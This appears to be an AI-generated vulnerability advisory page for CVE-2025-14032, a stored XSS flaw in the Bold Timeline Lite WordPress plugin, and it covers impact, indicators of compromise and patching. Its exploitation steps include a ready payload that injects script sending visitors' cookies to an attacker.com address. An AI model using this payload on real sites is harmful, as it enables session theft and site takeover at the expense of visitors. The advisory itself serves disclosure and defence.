CVE-2025-14032
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-14032 is a Stored Cross-Site Scripting (XSS) vulnerability in the Bold Timeline Lite plugin for WordPress, affecting all versions up to and including 1.2.7. The flaw exists in the title parameter of the bold_timeline_group shortcode due to insufficient input sanitization and output escaping. It was published on December 12, 2025, with the CVE assigned by Wordfence. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), stemming from the plugin's failure to sanitize the title parameter before rendering it in the bold_timeline_group shortcode output. The vulnerable code path is located in assets/views/bold_timeline_group_view.php at line 79, where user-supplied input is echoed without proper escaping. An authenticated attacker with at least Contributor-level access can embed malicious JavaScript in a post or page using the shortcode, which then executes in the browsers of any user who visits the affected page (Wordfence, WordPress Plugin Trac).

Impact

Successful exploitation allows persistent JavaScript execution in the context of any site visitor's browser session, enabling session hijacking, credential theft, defacement, or redirection to malicious sites. Because the injected script persists in stored content, all users who view the compromised page are affected — including administrators — potentially enabling privilege escalation or site takeover. Confidentiality and integrity are both impacted (low severity each per CVSS), while availability is not directly affected (Wordfence).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-14032. The EPSS score is approximately 0.03% (0.000300), indicating a very low probability of exploitation in the near term. The vulnerability requires authenticated access at the Contributor level or above, which limits the attack surface. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence).

Exploitation steps

  1. Gain Contributor Access: Obtain or register a WordPress account with at least Contributor-level privileges on the target site running Bold Timeline Lite ≤ 1.2.7.
  2. Create or Edit a Post: Navigate to the WordPress post editor and insert the bold_timeline_group shortcode with a malicious title parameter, e.g., [bold_timeline_group title="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].
  3. Publish the Content: Submit or update the post/page containing the injected shortcode. The malicious script is now stored in the database.
  4. Trigger Execution: When any user (including administrators) visits the page containing the shortcode, the injected JavaScript executes in their browser, enabling session cookie theft, credential harvesting, or further attacks (Wordfence, WordPress Plugin Trac).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to wp-admin/post.php or REST API endpoints containing bold_timeline_group shortcode with suspicious title values including <script>, javascript:, or encoded variants.
  • Database: Unexpected <script> tags or JavaScript URIs stored in the wp_posts table within post_content fields associated with the bold_timeline_group shortcode.
  • Network: Outbound requests from site visitors' browsers to unknown external domains shortly after loading pages containing the Bold Timeline Lite shortcode, potentially indicating cookie or credential exfiltration.
  • File System: No file-level changes expected for this stored XSS; focus monitoring on database content integrity.

Mitigation and workarounds

Users should update the Bold Timeline Lite plugin to version 1.2.8 or later, which addresses the insufficient sanitization of the title parameter. As an interim measure, site administrators can restrict Contributor-level user registration or disable the Bold Timeline Lite plugin until the update is applied. Reviewing existing posts for unexpected <script> tags in bold_timeline_group shortcodes is also recommended (Wordfence, WordPress Plugin).

Community reactions

Wordfence disclosed the vulnerability as part of their weekly WordPress vulnerability report for December 8–14, 2025, noting it as a medium-severity stored XSS issue. No significant broader media coverage or notable researcher commentary beyond the Wordfence advisory has been identified (Wordfence Blog).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-18603NONEN/A
  • cancel-order-request-woocommerce
NoYesAug 09, 2026
CVE-2026-18473NONEN/A
  • wpdirectorykit
NoYesAug 09, 2026
CVE-2026-18465NONEN/A
  • wp-google-map-gold
NoYesAug 09, 2026
CVE-2026-18464NONEN/A
  • wp-google-map-gold
NoYesAug 09, 2026
CVE-2026-18357NONEN/A
  • wpc-order-tip
NoYesAug 09, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management